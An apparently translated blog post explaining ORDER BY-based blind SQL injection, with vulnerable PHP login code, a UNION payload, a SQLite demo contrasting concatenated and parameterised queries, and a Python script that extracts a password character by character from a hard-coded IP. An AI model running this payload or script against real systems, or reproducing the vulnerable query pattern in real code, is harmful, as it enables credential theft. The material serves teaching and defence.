A friend's blog
https://yang1k.github.io/2018/02/26/sql%E6%B3%A8%E5%85%A5%E4%B9%8Border%20by%E6%B3%A8%E5%85%A5/
Principle
https://p0sec.net/index.php/archives/106/
The backend code is roughly as follows:

```php
<?php
// Vulnerable by design: $username is concatenated straight into the query text.
$sql = "select * from admin where username='".$username."'";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if(isset($row)&&$row['username']!="admin"){
    // A row whose username is not "admin" reached the check
    $hit="username error!";
}else{
    if ($row['password'] === $password){
        $hit="";
    }else{
        $hit="password error!";
    }
}
```
payload:

```
username=admin' or 1 union select 1,2,'字符串' order by 3
```

The resulting query:

```sql
select * from admin where username='admin' or 1 union select 1,2,binary '字符串' order by 3;
```

`binary` is there because of case: MySQL's default collation compares strings case-insensitively, so the `order by` comparison would otherwise not distinguish upper- and lower-case characters; casting the probe string to `binary` makes the comparison byte-wise.
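The backend fix, as an added example that is not from the blog post: the post's concatenated query beside a parameterised one, run against a constructed in-memory SQLite table (SQLite's `--` comment stands in for MySQL's `#`, and no `binary` cast is needed because SQLite compares text byte-wise by default; the table contents and the one-character probe `'S'` are constructed here).

```python
import sqlite3


def make_db():
    # Constructed fixture standing in for the post's `admin` table (not the blog's data).
    conn = sqlite3.connect(":memory:")
    conn.execute("create table admin (id integer, username text, password text)")
    conn.execute("insert into admin values (1, 'admin', 'S3cretPass')")
    return conn


def vulnerable_lookup(conn, username):
    # Same construction as the post's PHP: the username is pasted into the SQL
    # text, so quotes, UNION and ORDER BY inside it are parsed as SQL.
    sql = "select * from admin where username='" + username + "'"
    return conn.execute(sql).fetchone()


def safe_lookup(conn, username):
    # Parameterised: the driver binds the whole string as one value, so the
    # payload is only ever compared against the username column as data.
    return conn.execute("select * from admin where username=?", (username,)).fetchone()


# The post's payload with SQLite's `--` replacing MySQL's `#` and a constructed
# probe 'S' in place of the post's placeholder string.
PAYLOAD = "admin' or 1 union select 1,2,'S' order by 3 -- "


def demo():
    conn = make_db()
    return {
        # Honest lookup returns the admin row.
        "normal": vulnerable_lookup(conn, "admin"),
        # 'S' sorts before 'S3cretPass', so the UNION row (1, 2, 'S') comes first
        # and is what the PHP's username check sees: that ordering is the leak.
        "injected": vulnerable_lookup(conn, PAYLOAD),
        # Bound as a value, the same payload matches no username at all.
        "safe": safe_lookup(conn, PAYLOAD),
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(name, row)
```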
exp (one example, for reference only):

```python
import requests

payload = '0123456789abcdefghijklmnopqrstuvwxyz'
url = 'http://115.159.205.137:8001/'
test1 = ''
for a in range(1,50):
    for test2 in payload:
        # Probe string is the prefix found so far plus one candidate character
        data ={'username':"admin\' or 1 union select 1,2,\'%s%s\' order by 3#"%(test1,test2),'password':'sd'}
        r = requests.post(url,data=data)
        if 'admin' in r.text:
            # The real character is the one just before this candidate in the alphabet
            if 'a' in test2:
                test1 += '9'
            else:
                test1 += chr(ord(test2)-1)
            print (test1)
            break
```